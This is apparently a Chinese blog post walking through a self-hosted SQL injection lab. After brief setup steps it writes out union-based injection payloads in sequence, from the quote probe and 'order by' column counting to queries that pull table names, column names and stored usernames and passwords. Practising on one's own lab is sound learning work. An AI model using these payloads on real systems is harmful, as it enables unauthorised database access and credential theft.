1.创建数据库
2.导入sql文件
3.修改index.php文件参数账号密码与phpmyadmin登录密码一致
4.尝试' or 1=1 ,得到报错信息,说明后台的SQL语句中对于参数的引用使用了单引号。
5.输入admin' order by 3;-- +会返回正确页面,而输入admin' order by 4会报错
6.admin' order by 4;-- +会报错
7.admin' and 1=2 union select 1,user(),database();-- +
8。构造payload查询表名
admin' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=web23;-- +,此处paload构造错误, table_schema=database()。
admin' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database();-- +
9.构造payload查询列名 admin' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users';-- +
10.构造payload查询字段 admin' and 1=2 union select 1,2,group_concat(num,0x3a,username,0x3a,password) from users;-- +,此处使用0x3a,3a在ascii码,代表::
admin' and 1=2 union select 1,2,group_concat(num,0x2a,username,0x2a,password) from users;-- +,此处使用0x2a,2a在ascii码,代表*
标签:schema,admin,--,table,post,注入,select,union From: https://www.cnblogs.com/sentouceshi/p/17068319.html